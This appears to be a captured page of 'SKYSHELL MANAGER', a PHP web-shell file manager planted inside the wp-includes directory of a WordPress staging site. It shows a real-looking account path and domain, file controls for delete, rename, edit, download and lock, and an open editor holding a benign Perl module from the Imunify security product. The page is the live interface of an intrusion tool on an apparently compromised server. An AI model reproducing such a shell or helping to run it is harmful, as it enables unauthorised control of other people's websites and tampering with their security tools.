📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: File.pm
package Imunify::File; use strict; use warnings FATAL => 'all'; use File::Copy; use File::Basename; use Fcntl qw(SEEK_SET); use Encode; use Imunify::Exception; # default 100 KB use constant READ_LENGTH => 1024 * 100; sub get { my ($file) = @_; die Imunify::Exception->new("File not found.") if !-e $file; open FH, '<:encoding(UTF-8)', $file || die Imunify::Exception->new("Unable to open file."); return do { local $/; <FH>; }; } 1;
Save